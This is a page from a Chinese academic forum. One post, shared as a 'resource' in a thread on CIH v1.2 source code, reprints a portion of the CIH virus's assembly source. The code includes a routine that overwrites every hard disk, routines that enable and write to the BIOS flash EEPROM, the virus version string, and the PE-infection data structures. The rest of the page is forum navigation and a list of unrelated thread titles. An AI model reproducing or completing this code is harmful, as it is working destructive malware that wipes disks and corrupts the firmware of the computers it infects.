[资源]CIH v1.2源程序 - 信息科学 - 第2页小木虫论坛-学术科研互动平台

版块导航: 正在加载中...

客户端APP下载

论文辅导

调剂小程序

登录注册

应《网络安全法》要求，自2017年10月1日起，未进行实名认证将不得使用互联网跟帖服务。为保障您的帐号能够正常使用，请尽快对帐号进行手机号验证，感谢您的理解与支持！

24小时热门版块排行榜

返回列表

当前主题已经存档。

幻影无痕

荣誉版主 (知名作家)

小木虫论坛总监

应助: 2 (幼儿园)
贵宾: 8.003
金币: 16253.5
散金: 200
红花: 5
沙发: 5
帖子: 9634
在线: 58.2小时
虫号: 245777
注册: 2006-04-29
性别: GG
专业: 催化化学
管辖: 地学

; ***********************
; * Hide BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
; or al,10h
mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
call esi

; ***************************
; * Kill All HardDisk *
; ***************************************************
; * IOR Structure of IOS_SendCommand Needs *
; ***************************************************
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; ***************************************************

KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx

mov esi, esp
sub esp, 0ach

LoopOfKillHardDisk:
int 20h
dd 00100004h ; VXDCall IOS_SendCommand

cmp word ptr [esi+06h], 0017h
je KillNextDataSection

ChangeNextHardDisk:
inc byte ptr [esi+4dh]

jmp LoopOfKillHardDisk

KillNextDataSection:
add dword ptr [esi+10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber

jmp LoopOfKillHardDisk

; ***************************
; * Enable EEPROM to Write *
; ***************************

EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax], cl
mov [ecx], al

ret

; ***************************
; * IO for EEPROM *
; ***************************

IOForEEPROM:
@10 = IOForEEPROM

xchg eax, edi
xchg edx, ebp
out dx, eax

xchg eax, edi
xchg edx, ebp
in al, dx

BooleanCalculateCode = $
or al, 44h

xchg eax, edi
xchg edx, ebp
out dx, eax

xchg eax, edi
xchg edx, ebp
out dx, al

ret

; *********************************************************
; * Static Data *
; *********************************************************

LastVxDCallAddress = IFSMgr_Ring0_FileIO
VxDCallAddressTable db 00h
db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath

VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h
VxDCallTableSize = ($-VxDCallIDTable)/04h

; *********************************************************
; * Virus Version Copyright *
; *********************************************************

VirusVersionCopyright db 'CIH v'
db MajorVirusVersion+'0'
db '.'
db MinorVirusVersion+'0'
db ' TATUNG'

; *********************************************************
; * Virus Size *
; *********************************************************

VirusSize = $
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; + SizeOfTheFirstVirusCodeSectionTable(04h)

; *********************************************************
; * Dynamic Data *
; *********************************************************

VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress
OnBusy db 0
FileModificationTime dd ?

FileNameBuffer db FileNameBufferSize dup(?)
@7 = FileNameBuffer

DataBuffer = $
@8 = DataBuffer
NumberOfSections dw ?
TimeDateStamp dd ?
SymbolsPointer dd ?
NumberOfSymbols dd ?
SizeOfOptionalHeader dw ?
_Characteristics dw ?
Magic dw ?
LinkerVersion dw ?
SizeOfCode dd ?
SizeOfInitializedData dd ?
SizeOfUninitializedData dd ?
AddressOfEntryPoint dd ?
BaseOfCode dd ?
BaseOfData dd ?
ImageBase dd ?
@9 = $
SectionAlignment dd ?
FileAlignment dd ?
OperatingSystemVersion dd ?
ImageVersion dd ?
SubsystemVersion dd ?
Reserved dd ?
SizeOfImage dd ?
SizeOfHeaders dd ?
SizeOfImageHeaderToRead = $-NumberOfSections

NewAddressOfEntryPoint = DataBuffer ; DWORD
SizeOfImageHeaderToWrite = 04h

StartOfSectionTable = @9
SectionName = StartOfSectionTable ; QWORD
VirtualSize = StartOfSectionTable+08h ; DWORD
VirtualAddress = StartOfSectionTable+0ch ; DWORD
SizeOfRawData = StartOfSectionTable+10h ; DWORD
PointerToRawData = StartOfSectionTable+14h ; DWORD
PointerToRelocations = StartOfSectionTable+18h ; DWORD
PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD
NumberOfRelocations = StartOfSectionTable+20h ; WORD
NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD
Characteristics = StartOfSectionTable+24h ; DWORD
SizeOfScetionTable = Characteristics+04h-SectionName

; *********************************************************
; * Virus Total Need Memory *
; *********************************************************

VirusNeedBaseMemory = $

VirusTotalNeedMemory = @9
; + NumberOfSections(??)*SizeOfScetionTable(28h)
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; + SizeOfTheFirstVirusCodeSectionTable(04h)

; *********************************************************
; *********************************************************

赞一下

回复此楼

没能力危害祖国，没理由背离人民，没资本好逸恶劳，没本事损人利己，没机会见利忘义，没胆量违法乱纪，没钞票骄奢淫逸，只好愚昧无知了！

11楼2006-09-12 10:15:26

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

相关版块跳转我要订阅楼主航空母舰的主题更新

返回列表

最具人气热帖推荐 [查看全部]		作者	回/看	最后发表

[考研] 欢迎采矿、地质、岩土、计算机、人工智能等专业的同学报考 +3	pin8023 2026-02-28	5/250	2026-03-02 00:24 by 花YOU重开日
[考研] 求调剂 +5	yunziaaaaa 2026-03-01	6/300	2026-03-01 23:57 by ccp273206157
[基金申请] 成果系统访问量大，请一小时后再尝试。---NSFC啥时候好哦，已经两天这样了 +4	NSFC2026我来了 2026-02-28	4/200	2026-03-01 22:37 by 铁门栓
[硕博家园] 博士自荐 +7	科研狗111 2026-02-26	11/550	2026-03-01 22:24 by 哲平L
[考研] 0856求调剂285 +10	吕仔龙 2026-02-28	10/500	2026-03-01 21:37 by 公瑾逍遥
[考研] 0856化工专硕求调剂 +12	董boxing 2026-03-01	12/600	2026-03-01 19:45 by 材子momo
[考研] 一志愿中南大学理学化学 +4	15779376950 2026-03-01	5/250	2026-03-01 19:00 by Fff-1
[考研] 0856材料求调剂 +11	hyf hyf hyf 2026-02-28	12/600	2026-03-01 18:57 by 18137688336
[考研] 0857调剂 +3	一ll半 2026-02-28	3/150	2026-03-01 18:32 by 热情沙漠
[考研] 290求调剂 +9	材料专硕调剂； 2026-02-28	11/550	2026-03-01 17:21 by sunny81
[考研] 材料工程274求调剂 +3	Lilithan 2026-03-01	3/150	2026-03-01 14:58 by ms629
[考研] 求调剂 +6	repeatt?t 2026-02-28	6/300	2026-03-01 14:37 by Sakura绘
[考研] 课题组接收材料类调剂研究生 +3	gaoxiaoniuma 2026-02-28	4/200	2026-03-01 14:30 by jjj三跨
[考研] 298求调剂 +9	人间唯你是清欢 2026-02-28	12/600	2026-03-01 14:23 by Ducount.Y
[考研] 317一志愿华南理工电气工程求调剂 +6	Soliloquy_Q 2026-02-28	11/550	2026-03-01 11:14 by 歌liekkas
[考研] 311求调剂 +9	南迦720 2026-02-28	10/500	2026-03-01 10:55 by sunny81
[考研] 材料调剂 +4	爱擦汗的可乐冰 2026-02-28	4/200	2026-03-01 00:38 by 猫猫球alter
[考研] 304求调剂 +3	52hz~~ 2026-02-28	5/250	2026-03-01 00:00 by 52hz~~
[考研] 276求调剂 +3	路lyh123 2026-02-28	4/200	2026-02-28 19:45 by 路lyh123
[硕博家园] 【博士招生】太原理工大学2026化工博士 +4	N1ce_try 2026-02-24	8/400	2026-02-26 08:40 by N1ce_try